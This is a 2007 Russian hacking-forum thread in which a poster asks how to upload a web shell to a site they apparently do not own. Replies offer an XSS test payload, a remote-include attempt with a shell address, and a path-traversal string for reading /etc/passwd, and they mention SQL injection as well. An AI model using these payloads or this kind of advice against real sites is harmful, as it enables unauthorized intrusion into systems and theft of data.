HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Локальный Инклуд
   
Закрытая тема
Страница 1 из 3 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

Локальный Инклуд
  #1  
Старый 04.01.2007, 14:22
NightRider
Новичок
Регистрация: 03.01.2007
Сообщений: 4
С нами: 10184814

Репутация: 0
Exclamation Локальный Инклуд
Здравствуйте!

Такая проблема.

Сайт не фильтрует символы в адресной строке браузера. Что ты туда вводишь ( к примеру, тег изображения ), то этот тег станет картинкой в теле страницы. Вот в чем вопрос.

Мне надо залить файл shell.php на тот хостинг, где стоит сайт!! Но как это сделать - не знаю!

При чем, если в адр. строку браузера вписать index.php?idn=<img src=javascript:alert()>, то выскочит окно!!

Хелп, плиз!!!
𝕏 Twitter Reddit Telegram Копировать ссылку
 

  #2  
Старый 04.01.2007, 14:35
D=P=CH= MOD=
Постоянный
Регистрация: 15.08.2006
Сообщений: 404
С нами: 10388546

Репутация: 641
По умолчанию
index.php?idn=[Адрес шелла]

некатит? 0_о
 

  #3  
Старый 04.01.2007, 14:45
NightRider
Новичок
Регистрация: 03.01.2007
Сообщений: 4
С нами: 10184814

Репутация: 0
По умолчанию
Не получается. Пишет

Warning: main(categories/http://***.ru/shell.php.htm): failed to open stream: No such file or directory in /www/htdocs/index.php on line 440
 

  #4  
Старый 04.01.2007, 14:46
NightRider
Новичок
Регистрация: 03.01.2007
Сообщений: 4
С нами: 10184814

Репутация: 0
По умолчанию
Нужно что-то с тегами!
 

  #5  
Старый 04.01.2007, 14:58
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
С нами: 11269766

Репутация: 345


По умолчанию
толпаеп, это лок. инклуд насколько я понимаю... исчи статью Грин_бира про локальный инклуд
 

  #6  
Старый 04.01.2007, 15:10
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами: 10660753

Репутация: 676


По умолчанию
NightRider
Лучше дай ссылку на сайт посматреть, а то так не понятно что у тебя там, толи xss толи лок.инкдул... или вообще все вместе...
Попробуй /../../../../../../../etc/passwd%00 дописать
 

  #7  
Старый 04.01.2007, 15:13
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию
локальный инклуд...
 

  #8  
Старый 04.01.2007, 15:19
NightRider
Новичок
Регистрация: 03.01.2007
Сообщений: 4
С нами: 10184814

Репутация: 0
По умолчанию
 

  #9  
Старый 04.01.2007, 15:26
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами: 10660753

Репутация: 676


По умолчанию
там только xss работает...
через лок.инклуд не чего не поимеешь
 

  #10  
Старый 04.01.2007, 16:05
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
С нами: 10188326

Репутация: 1866


По умолчанию
там кстати скуль вместе с инклудом О_о
 
Закрытая тема
Страница 1 из 3 1 2 3 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Инклуд в SAPID Version 1.2.0 _kREveDKo_ Уязвимости 0 24.06.2006 00:47



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.